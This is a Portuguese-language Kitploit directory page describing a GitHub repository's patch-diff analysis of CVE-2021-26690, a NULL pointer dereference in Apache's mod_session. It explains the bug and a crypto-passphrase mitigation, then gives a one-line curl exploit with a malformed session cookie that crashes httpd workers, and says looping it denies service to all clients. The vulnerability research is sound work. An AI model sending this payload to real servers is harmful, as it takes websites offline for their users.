Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-26690---Apache-mod_session — CVE-2021-26690 diferenciação de patches - Apache HTTP mod_session desreferência de ponteiro nulo | Kitploit
Ferramentas/GitHubGitHub/7own/
cve-2021-26690---apache-mod_session
Análise de VulnerabilidadesExploraçãoSegurança WebTestes de Penetração
GitHub7own/cve-2021-26690---apache-mod_session

CVE-2021-26690---Apache-mod_session

CVE-2021-26690 diferenciação de patches - Apache HTTP mod_session desreferência de ponteiro nulo

Ver Repositório
11há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Análise de diferenças de patches para CVE-2021-26690 - Apache mod_session

Esta vulnerabilidade é uma desreferência de ponteiro NULL no módulo mod_session do Apache. Isso causará uma negação de serviço para os processos filhos do httpd do Apache. Usando um loop repetitivo, cada worker do Apache irá falhar, levando a uma negação de serviço para todos os clientes que se conectam ou estão conectados ao site.

Esta vulnerabilidade foi inicialmente descoberta por @antonio-morales.

Para as etapas completas do processo, consulte o PDF neste repositório.

Limitação

Se o servidor implementar a opção SessionCryptoPassphrase através de mod_session_crypto, o cookie será criptografado e codificado em base64.

root@kitploit:~
<IfModule mod_session.c>
Session On
SessionCookieName session path=/
SessionCryptoPassphrase "YourSecurePassphrase"
SessionMaxAge 1800
</IfModule>

Neste caso, os pares de cookies de sessão não podem ser adulterados, e a negação de serviço não pode ocorrer como está.

Exploit

root@kitploit:~
curl http://$IP:$PORT/ -v -b 'session=expiry=123456789&='
Baixar ferramenta